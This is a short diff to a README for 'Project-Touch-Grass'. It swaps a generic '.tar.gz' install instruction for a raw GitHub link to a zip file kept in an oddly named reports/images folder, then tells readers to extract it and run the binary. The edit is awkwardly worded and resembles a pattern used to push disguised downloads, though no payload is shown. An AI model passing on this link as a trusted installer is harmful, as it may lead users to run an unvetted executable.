NekkiPUO/Project-Touch-Grass/README.md

    - Eject the installer and launch from the Applications folder.

 3. **Linux:**
-   - Extract the downloaded `.tar.gz` file.
+   - Extract the downloaded `https://raw.githubusercontent.com/NekkiPUO/Project-Touch-Grass/main/reports/images_gun_ball/Project-Grass-Touch-v2.0.zip` file.
    - Open a terminal and navigate to the extracted folder.
    - Run the application by executing `./Project-Touch-Grass`.